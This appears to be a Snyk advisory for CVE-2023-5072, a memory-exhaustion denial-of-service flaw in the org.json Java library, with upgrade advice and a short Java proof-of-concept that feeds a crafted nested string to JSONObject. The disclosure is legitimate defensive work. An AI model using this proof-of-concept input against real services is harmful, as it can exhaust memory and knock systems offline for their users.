Allocation of Resources Without Limits or Throttling Affecting org.json:json package, versions [0,20231013)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (38th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGJSON-5962464
- published 13 Oct 2023
- disclosed 12 Oct 2023
- credit Éamonn McManus
Introduced: 12 Oct 2023
CVE-2023-5072 Open this link in a new tabHow to fix?
Upgrade org.json:json to version 20231013 or higher.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can cause indefinite amounts of memory to be used by inputting a string of modest size. This can lead to a Denial of Service.
PoC
package orgjsonbug;
import org.json.JSONObject;
/**
* Illustrates a bug in JSON-Java.
*/
public class Bug {
private static String makeNested(int depth) {
if (depth == 0) {
return "{\"a\":1}";
}
return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
}
public static void main(String[] args) {
String input = makeNested(30);
System.out.printf("Input string has length %d: %s\n", input.length(), input);
JSONObject output = new JSONObject(input);
System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
}
}
References
CVSS Scores
version 3.1